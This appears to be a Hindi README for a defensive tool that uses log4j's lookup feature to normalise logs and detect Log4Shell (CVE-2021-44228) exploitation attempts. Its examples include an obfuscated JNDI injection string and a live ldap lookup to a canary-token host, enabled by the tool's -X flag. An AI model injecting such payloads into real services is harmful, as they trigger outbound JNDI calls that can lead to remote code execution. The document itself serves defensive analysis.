
कुछ उपकरण जो Apache Log4j 2 CVE-2021-44228 को कम करने में मदद करते हैं
Apache Log4j 2 CVE-2021-44228 का विश्लेषण करने में मदद करने वाला एक उपकरण
यह उपकरण JNDI भेद्यता के विरुद्ध परीक्षण करने के लिए log4j-2 की "lookup" सुविधा का उपयोग करता है। उद्देश्य lookup सुविधा को आसानी से चलाना है (उदाहरण के लिए लॉग को सामान्य करना या किसी पेलोड पर वास्तविक परीक्षण करना - कृपया सावधान रहें)।
निर्माण के लिए : "make" (सुविधा के लिए, JndiLookup.jar फ़ाइल इस git में शामिल है)।
निर्माण के बाद, आप "java -jar JndiLookup.jar" के साथ उपकरण चला सकते हैं (log4j बाइनरी वाला log4j निर्देशिका JndiLookup.jar के समान पथ में होनी चाहिए)।
बिना किसी तर्क के, JndiLookup उपकरण stdin से पंक्तियाँ पढ़ता है और log4j lookup सुविधा का उपयोग करके उन्हें "रूपांतरित" करता है - यह लॉग को सामान्य करने और शोषण प्रयासों की खोज करने में उपयोगी होना चाहिए।
उदाहरण के लिए : cat access.log | java -jar JndiLookup.jar
यदि आप कमांड लाइन पर एक स्ट्रिंग पास करते हैं, तो उपकरण इस स्ट्रिंग को रूपांतरित करेगा और बाहर निकल जाएगा (कृपया सभी '$' वर्णों को एस्केप करें)।
उदाहरण के लिए : java -jar JndiLookup.jar java -jar JndiLookup.jar "\${jndi:\${lower:l}\${lower:d}a\${lower:p}://world443.log4j.bin\${upper:a}ryedge.io:80/callback}"
डिफ़ॉल्ट रूप से, JNDI lookup अक्षम है (और एक lookup फ़ंक्शन द्वारा बदल दिया गया है जो केवल "jndi:" जोड़ेगा) लेकिन JndiLookup को "-X" पैरामीटर पास करके वास्तविक JNDI lookup सक्षम करना संभव है ("-X" को पहले पैरामीटर के रूप में पास किया जाना चाहिए); कृपया इससे सावधान रहें क्योंकि इससे आपका सिस्टम खतरे में पड़ सकता है।
उदाहरण के लिए : java -jar JndiLookup.jar -X "\${jndi:ldap://w8pcb14reujq65vic39pz9amv.canarytokens.com/a}" [ यह उदाहरण मेरे एक कैनरी टोकन का उपयोग करता है, यह केवल उदाहरण के लिए है; कृपया जान लें कि यदि आप इस कमांड का उपयोग करते हैं तो मुझे सूचित किया जाएगा - मेरी ओर से कोई समस्या नहीं है लेकिन मुझे वह IP मिल जाएगा जहाँ से DNS अनुरोध किया गया है ]
उपयोग किए गए log4j बाइनरीज़ में निम्नलिखित lookup सक्षम हैं (मानक उपयोग के लिए 2.15.0, JNDI-सक्षम उपयोग के लिए 2.14.1):
अन्य lookup आपके वातावरण के आधार पर उपलब्ध हो सकते हैं:
[ कृपया lookup प्लगइन सक्रियण के विवरण के लिए https://github.com/apache/logging-log4j2/blob/c30a1398a6697fb832c650870c44284d0052103e/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java देखें ]
कृपया ध्यान रखें कि यह उपकरण log4j lookup सुविधा के वास्तविक कोड का उपयोग करता है और यह अन्य (गैर-JNDI) सुरक्षा मुद्दों के कारण कमजोर हो सकता है।